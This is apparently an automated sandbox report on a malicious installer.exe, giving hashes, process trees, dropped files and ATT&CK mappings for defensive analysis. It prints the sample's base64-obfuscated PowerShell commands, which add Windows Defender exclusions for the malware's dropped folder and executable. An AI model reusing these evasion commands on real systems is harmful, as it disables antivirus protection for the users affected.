156cc4ef32137f0f9a8df03c32c1b0b506c72355c08bbf6f8c07279a53a7922b

General

Target

installer.exe
Size

18.7MB
MD5

9cd846ea50a04e3d926b8adbfdcb9dff
SHA1

1c2d7e2e672e8aa64853f8a2b6b0ff7e97117465
SHA256

156cc4ef32137f0f9a8df03c32c1b0b506c72355c08bbf6f8c07279a53a7922b
SHA512

1b60385c3df8a331f3824954532262d63c7218459e1d7241b37c652520510e68d300d620b31f74492942a705434c740f336c44482ddebc1c04db60e4b50a933f
SSDEEP

98304:eI0CniMX77777773773W/lcCjQI7wnHsv8pMCTzSAhmyhJONL+L8JCE8fh9mdJOW:Nii77777773773WICRPZQ2isH

Score

8^/10

execution

Malware Config

Signatures

Downloads MZ/PE file

Executes dropped EXE 1 IoCs

pid	Process
2860	efxtdslsxmliheae.exe

Loads dropped DLL 6 IoCs

pid	Process
1732	installer.exe
1732	installer.exe
2432	WerFault.exe
2432	WerFault.exe
2432	WerFault.exe
2432	WerFault.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2540	powershell.exe
3004	powershell.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2540	powershell.exe
3004	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2540	powershell.exe
Token: SeDebugPrivilege	3004	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 1732 wrote to memory of 2540	1732	installer.exe	32
PID 1732 wrote to memory of 2540	1732	installer.exe	32
PID 1732 wrote to memory of 2540	1732	installer.exe	32
PID 1732 wrote to memory of 3004	1732	installer.exe	34
PID 1732 wrote to memory of 3004	1732	installer.exe	34
PID 1732 wrote to memory of 3004	1732	installer.exe	34
PID 1732 wrote to memory of 2860	1732	installer.exe	36
PID 1732 wrote to memory of 2860	1732	installer.exe	36
PID 1732 wrote to memory of 2860	1732	installer.exe	36
PID 2860 wrote to memory of 2432	2860	efxtdslsxmliheae.exe	37
PID 2860 wrote to memory of 2432	2860	efxtdslsxmliheae.exe	37
PID 2860 wrote to memory of 2432	2860	efxtdslsxmliheae.exe	37

C:\Users\Admin\AppData\Local\Temp\installer.exe
"C:\Users\Admin\AppData\Local\Temp\installer.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1732
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" "-Command" "$cmd = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiQzpcVXNlcnNcQWRtaW5cYnp1Znhod3psaHZqcWVncCI=')); Invoke-Expression $cmd"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2540
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" "-Command" "$cmd = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiQzpcVXNlcnNcQWRtaW5cYnp1Znhod3psaHZqcWVncFxlZnh0ZHNsc3htbGloZWFlLmV4ZSI=')); Invoke-Expression $cmd"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3004
- C:\Users\Admin\bzufxhwzlhvjqegp\efxtdslsxmliheae.exe
  "C:\Users\Admin\bzufxhwzlhvjqegp\efxtdslsxmliheae.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2860
- - C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -u -p 2860 -s 28
    3⤵
    - Loads dropped DLL
    PID:2432

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DU9WGWIQE9R4N3ECJTQB.temp

Filesize
7KB

MD5
61a5736e4a4115216ef62b443b2a530a

SHA1
b27c397274f70145a0cf85adb99203999fed66ef

SHA256
cfe537960eec1a5ccf28fbe7282dd4993b800643c7505b4e819a2692869351f7

SHA512
c580ccdc6f32be38f7eb98e084d954670172994e456a04a32336dbc1657477b44042064e7a24c1d0ec4ab9f623d2d4cb2fc0001f84f34ae6567ce95d00064f24

Download Submit
C:\Users\Admin\bzufxhwzlhvjqegp\efxtdslsxmliheae.exe

Filesize
2.6MB

MD5
98e56fc6276f5ea11ed37de5b40116d3

SHA1
882fd2c385eeaffec3881b3262de638ff912f276

SHA256
9006378885c4a84699ad0f90dbe7579969e3a1b41f6fd334c4e440d30a15d063

SHA512
978c3f3e5e866db2cc59a3474a6b75291b3eba44d445887c2afd50218dce776a650822eb67118481e62411b02102c7e49a1dc99db507d4cca59d0253b5b1a19b

Download Submit
memory/1732-0-0x0000000000400000-0x0000000000DF4000-memory.dmp

Filesize
10.0MB

Download
memory/1732-28-0x0000000000400000-0x0000000000DF4000-memory.dmp

Filesize
10.0MB

Download
memory/2540-12-0x000007FEF4680000-0x000007FEF501D000-memory.dmp

Filesize
9.6MB

Download
memory/2540-6-0x000007FEF4680000-0x000007FEF501D000-memory.dmp

Filesize
9.6MB

Download
memory/2540-11-0x000007FEF4680000-0x000007FEF501D000-memory.dmp

Filesize
9.6MB

Download
memory/2540-10-0x000007FEF4680000-0x000007FEF501D000-memory.dmp

Filesize
9.6MB

Download
memory/2540-7-0x000000001B580000-0x000000001B862000-memory.dmp

Filesize
2.9MB

Download
memory/2540-13-0x000007FEF4680000-0x000007FEF501D000-memory.dmp

Filesize
9.6MB

Download
memory/2540-8-0x0000000001D30000-0x0000000001D38000-memory.dmp

Filesize
32KB

Download
memory/2540-9-0x000007FEF4680000-0x000007FEF501D000-memory.dmp

Filesize
9.6MB

Download
memory/2540-5-0x000007FEF493E000-0x000007FEF493F000-memory.dmp

Filesize
4KB

Download
memory/2860-33-0x000000013FF10000-0x00000001401B6000-memory.dmp

Filesize
2.6MB

Download
memory/3004-20-0x000000001B670000-0x000000001B952000-memory.dmp

Filesize
2.9MB

Download
memory/3004-21-0x0000000000560000-0x0000000000568000-memory.dmp

Filesize
32KB

Download

Analysis

Sharing